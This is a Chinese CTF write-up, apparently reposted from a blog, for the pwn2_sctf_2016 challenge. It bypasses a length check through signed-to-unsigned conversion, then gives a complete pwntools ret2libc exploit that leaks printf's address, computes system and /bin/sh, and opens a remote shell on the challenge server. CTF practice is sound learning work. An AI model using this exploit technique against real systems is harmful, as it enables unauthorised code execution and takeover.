标签： addr libc printf sendlineafter p32 payload

pwn2_sctf_2016

1.ida分析

存在栈溢出漏洞，但是有一个限制输入字符数的保护。

 可以看到参数a2从int类型变成了unsigned int类型，可以利用来绕过保护。（一开始一直卡在怎么绕过，麻了）

2.checksec

3.解决

from pwn import *
from LibcSearcher import *
context.log_level='debug'

p=remote('node4.buuoj.cn',28425)
#p=process('./pwn2_sctf_2016')
elf=ELF('pwn2_sctf_2016')
printf_got=elf.got['printf']
printf_plt=elf.plt['printf']
main=0x804852f

p.sendlineafter('read? ',str(-1))

payload='a'*0x30+p32(printf_plt)+p32(main)+p32(printf_got)
p.sendlineafter('data!\n',payload)


p.recvuntil('\n')
#gdb.attach(p)
printf_addr=u32(p.recv(4))
print hex(printf_addr)

libc=LibcSearcher("printf",printf_addr)
base=printf_addr-libc.dump("printf")
system=base+libc.dump("system")
bin_sh=base+libc.dump("str_bin_sh")

p.sendlineafter('read? ',str(-1))

payload='a'*0x30+p32(system)+p32(main)+p32(bin_sh)
p.sendlineafter('data!\n',payload)


p.interactive()

标签：,addr,libc,printf,sendlineafter,p32,payload
来源： https://www.cnblogs.com/mio-yy/p/15028458.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。